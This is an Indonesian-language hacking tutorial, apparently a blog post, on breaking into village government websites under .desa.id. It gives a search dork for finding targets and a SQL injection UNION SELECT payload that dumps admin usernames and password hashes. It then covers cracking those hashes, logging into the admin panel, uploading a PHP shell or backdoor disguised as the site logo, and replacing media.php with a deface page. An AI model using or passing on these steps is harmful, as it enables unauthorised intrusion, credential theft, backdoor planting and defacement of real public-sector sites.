inurl:/semua-album site:.desa.id ( bisa dikembangkan )
ini target ane bro , masi segar ya
klik berita desa
dan pilih berita yang teratas
liat htmlnya , tambahin exploitnya disamping kiri .
-' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(username,0x3a,password),30,31,32 from+users+--+
jika udah enter aja gan , ga usah ragu , pasti akan keluar togelnya :v kek dibawah ini. ini assword harus di hash dulu ya
tekan CTRL + U
setelah itu CTRL + F ketik admin , copy passwordnya yang harus di hash tadi
passwordya tadi masukkin ke hashkiller biar kita crack password aslinya seperti dibawah ini, kalau ga keluar atau not found cari target lain aja
tempat login admin pagenya . site.com/redaktur
klik modul web > edit dan ganti logo tadi menjadi shell/backdoor agan (tidak ditemper data juga bisa)
untuk mencari letak shell/backdoornya yang di upload tadi
site.com/logo/namashell.php
bagi kalian yang manial index :v klik public_html
cari media.php dan edit script web menjadi script deface anda setelah itu klik save
dan ini hasilnya
selesai sampai sini aja
terima kasih atas kunjungannyaaaaa ... ^_^
sumber = Orang Ganteng
Facebook Sumber = Orang Ganteng
0 komentar